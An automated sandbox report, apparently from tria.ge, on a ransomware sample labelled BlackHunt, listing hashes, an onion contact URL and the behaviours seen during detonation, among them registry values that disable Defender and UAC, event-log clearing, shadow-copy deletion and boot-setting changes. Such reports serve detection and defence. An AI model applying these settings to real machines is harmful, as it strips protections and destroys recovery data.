Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
17/01/2024, 20:11
Static task
static1
Behavioral task
behavioral1
Sample
23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe
Resource
win10v2004-20231215-en
General
-
Target
23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe
-
Size
707KB
-
MD5
6bef23cd23eeb7d37efb58ae7be872f4
-
SHA1
5104749cf54d1ced32d53e46809d2b79452f3870
-
SHA256
23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8
-
SHA512
a6f7324d6a2d69b89638e6f9ceb2ac331879e334589ebbd0bdac17dc06a0ed3ca42502b1f6a44c5c55ad66371ba891294b63eb496ef15a3670e93d53df017642
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1O86vnh:6uaTmkZJ+naie5OTamgEoKxLWFUh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 4020 fsutil.exe 2768 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3828 wevtutil.exe 1676 wevtutil.exe 3348 wevtutil.exe 1840 wevtutil.exe 868 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1812 bcdedit.exe 3972 bcdedit.exe 776 bcdedit.exe 3892 bcdedit.exe -
Renames multiple (2509) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1152 wbadmin.exe 2004 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3588 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\I: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\O: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\E: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\Y: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\P: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\L: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\B: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\M: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\W: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\K: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\X: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\V: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\U: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\S: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\N: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\R: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\T: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\A: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\H: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\J: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened (read-only) \??\Z: 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_zh_CN.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Jamaica 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\ResolveDismount.xlt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Fakaofo 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\VideoLAN\VLC\locale\be\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_SelectionSubpicture.png 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\1047x576black.png 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.data\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground.wmv 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jre7\lib\management\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui_5.5.0.165303.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Berlin 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\7-Zip\7z.sfx 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576black.png 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\DVD Maker\#BlackHunt_Private.key 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop.wmv 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Anchorage 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref_PAL.wmv 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+11 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#BlackHunt_ReadMe.hta 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#BlackHunt_ReadMe.txt 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2600 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2164 vssadmin.exe 684 vssadmin.exe 3920 vssadmin.exe 3888 vssadmin.exe 4012 vssadmin.exe 3992 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 268 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 wbadmin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ wbadmin.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4044 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1928 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeRestorePrivilege 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeBackupPrivilege 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeTakeOwnershipPrivilege 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeAuditPrivilege 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeSecurityPrivilege 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeIncBasePriorityPrivilege 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe Token: SeBackupPrivilege 3300 vssvc.exe Token: SeRestorePrivilege 3300 vssvc.exe Token: SeAuditPrivilege 3300 vssvc.exe Token: SeBackupPrivilege 2840 wbengine.exe Token: SeRestorePrivilege 2840 wbengine.exe Token: SeSecurityPrivilege 2840 wbengine.exe Token: SeSecurityPrivilege 3828 wevtutil.exe Token: SeBackupPrivilege 3828 wevtutil.exe Token: SeSecurityPrivilege 1676 wevtutil.exe Token: SeBackupPrivilege 1676 wevtutil.exe Token: SeSecurityPrivilege 3348 wevtutil.exe Token: SeBackupPrivilege 3348 wevtutil.exe Token: SeSecurityPrivilege 1840 wevtutil.exe Token: SeBackupPrivilege 1840 wevtutil.exe Token: SeSecurityPrivilege 868 wevtutil.exe Token: SeBackupPrivilege 868 wevtutil.exe Token: SeDebugPrivilege 268 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2544 wrote to memory of 2728 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 29 PID 2544 wrote to memory of 2728 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 29 PID 2544 wrote to memory of 2728 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 29 PID 2544 wrote to memory of 2728 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 29 PID 2544 wrote to memory of 2792 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 30 PID 2544 wrote to memory of 2792 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 30 PID 2544 wrote to memory of 2792 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 30 PID 2544 wrote to memory of 2792 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 30 PID 2544 wrote to memory of 2796 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 124 PID 2544 wrote to memory of 2796 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 124 PID 2544 wrote to memory of 2796 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 124 PID 2544 wrote to memory of 2796 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 124 PID 2544 wrote to memory of 2860 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 32 PID 2544 wrote to memory of 2860 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 32 PID 2544 wrote to memory of 2860 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 32 PID 2544 wrote to memory of 2860 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 32 PID 2544 wrote to memory of 2736 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 35 PID 2544 wrote to memory of 2736 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 35 PID 2544 wrote to memory of 2736 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 35 PID 2544 wrote to memory of 2736 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 35 PID 2544 wrote to memory of 2972 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 38 PID 2544 wrote to memory of 2972 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 38 PID 2544 wrote to memory of 2972 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 38 PID 2544 wrote to memory of 2972 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 38 PID 2544 wrote to memory of 3044 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 39 PID 2544 wrote to memory of 3044 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 39 PID 2544 wrote to memory of 3044 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 39 PID 2544 wrote to memory of 3044 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 39 PID 2544 wrote to memory of 2712 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 40 PID 2544 wrote to memory of 2712 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 40 PID 2544 wrote to memory of 2712 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 40 PID 2544 wrote to memory of 2712 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 40 PID 2544 wrote to memory of 2248 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 41 PID 2544 wrote to memory of 2248 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 41 PID 2544 wrote to memory of 2248 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 41 PID 2544 wrote to memory of 2248 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 41 PID 2544 wrote to memory of 3040 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 43 PID 2544 wrote to memory of 3040 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 43 PID 2544 wrote to memory of 3040 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 43 PID 2544 wrote to memory of 3040 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 43 PID 2544 wrote to memory of 2600 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 150 PID 2544 wrote to memory of 2600 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 150 PID 2544 wrote to memory of 2600 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 150 PID 2544 wrote to memory of 2600 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 150 PID 2544 wrote to memory of 2868 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 48 PID 2544 wrote to memory of 2868 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 48 PID 2544 wrote to memory of 2868 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 48 PID 2544 wrote to memory of 2868 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 48 PID 2544 wrote to memory of 2624 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 50 PID 2544 wrote to memory of 2624 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 50 PID 2544 wrote to memory of 2624 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 50 PID 2544 wrote to memory of 2624 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 50 PID 2544 wrote to memory of 1636 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 51 PID 2544 wrote to memory of 1636 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 51 PID 2544 wrote to memory of 1636 2544 23d4fd505b845260266d5e3b7cd116a448df9a4784c5aefbef738c988264a5d8.exe 51 PID 2544 wrote to memory of 1636 2544 